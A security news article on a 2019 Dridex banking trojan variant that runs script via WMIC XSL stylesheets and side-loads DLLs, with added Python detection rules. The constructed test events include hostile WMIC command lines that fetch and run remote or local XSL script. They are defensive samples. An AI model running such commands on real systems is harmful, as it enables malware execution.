
New version of the Dridex banking trojan slips past antivirus products

Information security professionals have known about the Dridex banking trojan since 2014, and it remains one of the most sophisticated malware families in its category.

Development of the malware continues to this day: new versions of the Trojan appear regularly, and large updates are released periodically.

In early June 2019, independent security researcher Brad Duncan discovered a new version of Dridex that uses an application whitelisting bypass. Where Windows Script Host components are blocked or disabled, the malware abuses the WMI command-line utility (WMIC) to execute script carried in XSL stylesheets, so the defenses aimed at Windows Script Host never come into play.
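The WMIC abuse described above works through WMIC's /FORMAT switch, which accepts not only built-in keywords (list, csv, htable and so on) but also a path or URL to an arbitrary XSL stylesheet whose embedded script WMIC will run. The following detection logic, added here as an example and not code from the article, from eSentire or from Brad Duncan, runs over process-creation records in the shape of Sysmon Event ID 1 and flags WMIC invocations whose /FORMAT value points anywhere other than the stylesheets shipped in System32\wbem. All sample records are constructed; the URLs, paths and process IDs in them are illustrative.

```python
"""Detection logic for WMIC /FORMAT abuse (XSL script processing, MITRE ATT&CK T1220).

Added example, not code from the article, from eSentire or from Brad Duncan.
Field names follow Sysmon Event ID 1 (process creation); all records are constructed.
"""
import ntpath
import re
from typing import Dict, List, Optional

# WMIC accepts "/FORMAT:<keyword|path|URL>"; the value may be quoted.
_FORMAT_ARG = re.compile(r'/format\s*:\s*(?:"([^"]*)"|(\S+))', re.IGNORECASE)

# Stylesheets that ship with Windows live in System32\wbem (and SysWOW64\wbem).
_WBEM_FILE = re.compile(r"[a-z]:\\windows\\(?:system32|syswow64)\\wbem\\[^\\]+")

# URL scheme prefix, e.g. https:// or ftp://
_URL_SCHEME = re.compile(r"[a-z][a-z0-9+.-]*://")


def classify_format_value(value: str) -> Optional[str]:
    """Return why a /FORMAT value is suspicious, or None for ordinary WMIC usage.

    Bare keywords such as list, csv or htable are normal. A URL, a UNC or local path
    outside System32\\wbem, or any other .xsl reference means WMIC will fetch and run
    script from a stylesheet the attacker controls.
    """
    v = value.strip().strip('"').lower()
    if not v:
        return None
    if _URL_SCHEME.match(v):
        return f"remote XSL stylesheet: {value}"
    if "\\" in v or "/" in v or v.endswith(".xsl"):
        if _WBEM_FILE.fullmatch(v):
            return None  # explicit path to a built-in stylesheet
        # Conservative: a bare "foo.xsl" is not one of the documented keywords either.
        return f"stylesheet outside System32\\wbem: {value}"
    return None


def is_wmic(event: Dict[str, object]) -> bool:
    """Match WMIC by image name or by the PE's original file name (catches renamed copies)."""
    image = ntpath.basename(str(event.get("Image", ""))).lower()
    original = str(event.get("OriginalFileName", "")).lower()
    return image == "wmic.exe" or original == "wmic.exe"


def detect_wmic_xsl(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return one finding per WMIC process whose /FORMAT argument names an external stylesheet."""
    findings = []
    for ev in events:
        if not is_wmic(ev):
            continue
        cmdline = str(ev.get("CommandLine", ""))
        for m in _FORMAT_ARG.finditer(cmdline):
            value = m.group(1) if m.group(1) is not None else m.group(2)
            reason = classify_format_value(value)
            if reason:
                findings.append({
                    "pid": ev.get("ProcessId"),
                    "parent": ev.get("ParentImage"),
                    "reason": reason,
                    "command_line": cmdline,
                })
                break  # one finding per process
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"ProcessId": 4012, "Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic os get Caption,Version /format:list"},                 # benign keyword
    {"ProcessId": 4100, "Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": 'wmic os get /FORMAT:"https://example.invalid/stage1.xsl"'},  # remote XSL
    {"ProcessId": 4188, "Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"wmic process list /format:C:\Users\Public\update.xsl"},    # local XSL
    {"ProcessId": 4200, "Image": r"C:\Windows\System32\wbem\WMIC.exe", "OriginalFileName": "wmic.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"wmic os get /format:C:\Windows\System32\wbem\csv.xsl"},    # built-in, benign
    {"ProcessId": 4300, "Image": r"C:\Users\alice\AppData\Local\Temp\svc.exe", "OriginalFileName": "wmic.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"svc.exe os get /format:\\10.0.0.5\share\x.xsl"},          # renamed WMIC, UNC XSL
    {"ProcessId": 4400, "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c type notes.txt /format:x.xsl"},                      # not WMIC, ignored
]

if __name__ == "__main__":
    for f in detect_wmic_xsl(SAMPLE_EVENTS):
        print(f"pid {f['pid']} (parent {f['parent']}): {f['reason']}")
```

Matching on OriginalFileName as well as the image path matters because the attacker can copy wmic.exe under another name; the /FORMAT argument, not the binary's name or hash, is what identifies the technique.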


“Of note, the Dridex DLL files are 64-bit DLLs using file names that are loaded by legitimate Microsoft Windows system EXEs. These file paths, file names, and associated SHA256 hashes change every time the victim logs onto the infected Windows host,” Brad Duncan reported.

A more detailed report on the new version of the Trojan has now been released by researchers at eSentire. They write that when the sample was first uploaded to VirusTotal, only 6 of 60 security products flagged it as malicious. As of July 2, 2019, the number of detections had risen to 46 of 60.

The eSentire analysts write that the new variant of Dridex is distributed through spam emails with malicious attachments. The attached documents contain malicious macros that can be triggered by various user interactions, depending on the target system environment.

“The malware targets banking information on the victim system. Over the last decade, Dridex underwent a series of feature augmentations, including a transition to XML scripts, hashing algorithms, peer-to-peer encryption, and peer-to-command-and-control encryption,” eSentire specialists reported.

The experts warn that many antivirus products may flag suspicious Dridex behavior but will not be able to identify accurately what they are seeing. Because the Trojan's components change constantly, with file paths, names and hashes differing from one logon to the next, purely signature-based antivirus software may be useless against Dridex.
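Since the DLL paths, names and hashes rotate at every logon, a hunt for the loader pattern Duncan describes (a legitimate Windows system executable loading a DLL that borrows a system DLL's name) has to key on where the DLL is loaded from and how it is signed, never on its hash. The following rule, added here as an example and not code from the article, from eSentire or from Brad Duncan, does that over image-load records in the shape of Sysmon Event ID 7. The sample records are constructed, and the sets of system executables and System32 DLL names are an illustrative subset (an assumption), not a complete inventory.

```python
"""Hunt for DLL side-loading by Windows system executables without using file hashes.

Added example, not code from the article, from eSentire or from Brad Duncan. Records
mimic Sysmon Event ID 7 (image load) fields and are all constructed; the EXE and DLL
name sets are an illustrative subset (assumption), not a complete inventory.
"""
import ntpath
from typing import Dict, List

# Where Windows loads its own DLLs from. A system EXE pulling one of its usual DLL names
# from anywhere else is the side-loading / search-order-hijack pattern.
TRUSTED_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")

# Windows executables commonly copied or abused as DLL hosts (illustrative subset).
SYSTEM_EXES = {"svchost.exe", "explorer.exe", "mstsc.exe", "wermgr.exe", "dllhost.exe", "rundll32.exe"}

# DLL names that normally resolve to System32 (illustrative subset; build the real list
# from a clean reference host of the same Windows build).
SYSTEM32_DLL_NAMES = {"version.dll", "wtsapi32.dll", "dwmapi.dll", "uxtheme.dll",
                      "cryptbase.dll", "propsys.dll", "winmm.dll"}


def is_trusted_dir(path: str) -> bool:
    """True if the file sits in (or under) one of the Windows DLL directories."""
    directory = ntpath.dirname(path).lower()
    return any(directory == d or directory.startswith(d + "\\") for d in TRUSTED_DIRS)


def is_microsoft_signed(event: Dict[str, str]) -> bool:
    """Sysmon reports the Authenticode signer and its validity on image-load events."""
    return event.get("SignatureStatus") == "Valid" and event.get("Signature", "").startswith("Microsoft")


def detect_side_loading(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Flag a system EXE loading a system-named DLL from an untrusted directory.

    The Hashes field is carried along for triage only; matching never depends on it,
    because the Dridex DLLs' paths, names and hashes change on every logon.
    """
    findings = []
    for ev in events:
        process = ntpath.basename(ev["Image"]).lower()
        dll_path = ev["ImageLoaded"]
        if process not in SYSTEM_EXES:
            continue
        if ntpath.basename(dll_path).lower() not in SYSTEM32_DLL_NAMES:
            continue
        if is_trusted_dir(dll_path) or is_microsoft_signed(ev):
            continue
        findings.append({
            "process": ev["Image"],
            "dll": dll_path,
            "signed": ev.get("Signed", "false"),
            "hashes": ev.get("Hashes", ""),
        })
    return findings


# Constructed sample image-load events (not real telemetry).
SAMPLE_LOADS: List[Dict[str, str]] = [
    # Normal: system DLL loaded from System32.
    {"Image": r"C:\Windows\System32\svchost.exe", "ImageLoaded": r"C:\Windows\System32\version.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid",
     "Hashes": "SHA256=" + "00" * 32},
    # Legitimate EXE copied next to a malicious DLL that reuses a system DLL name.
    {"Image": r"C:\Users\bob\AppData\Roaming\Xg3k\wermgr.exe",
     "ImageLoaded": r"C:\Users\bob\AppData\Roaming\Xg3k\version.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable",
     "Hashes": "SHA256=" + "11" * 32},
    # System EXE started from System32 but resolving a DLL from a writable path.
    {"Image": r"C:\Windows\System32\mstsc.exe", "ImageLoaded": r"C:\Users\Public\wtsapi32.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable",
     "Hashes": "SHA256=" + "22" * 32},
    # Third-party application shipping its own DLL: out of scope for this rule.
    {"Image": r"C:\Program Files\Vendor\app.exe", "ImageLoaded": r"C:\Program Files\Vendor\version.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable",
     "Hashes": "SHA256=" + "33" * 32},
    # Microsoft-signed redistributed component outside System32: allowed.
    {"Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Program Files\Common Files\Microsoft Shared\Ink\propsys.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid",
     "Hashes": "SHA256=" + "44" * 32},
]

if __name__ == "__main__":
    for f in detect_side_loading(SAMPLE_LOADS):
        print(f"{f['process']} loaded {f['dll']} (signed={f['signed']}) {f['hashes']}")
```

The rule deliberately tolerates Microsoft-signed DLLs outside System32 and ignores third-party executables; both choices trade recall for a manageable alert volume, and the signer check should be tightened if an environment allows only its own code-signing certificates.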

Recommendations:

Because email is the initial access vector, employees are the first line of defense against this threat. Expect finance departments to be targeted with unsolicited invoices carrying malicious macros. Note also that blocking Windows Script Host alone does not stop this variant, since it runs its script through WMIC, so WMIC invocations that load XSL stylesheets deserve monitoring as well.
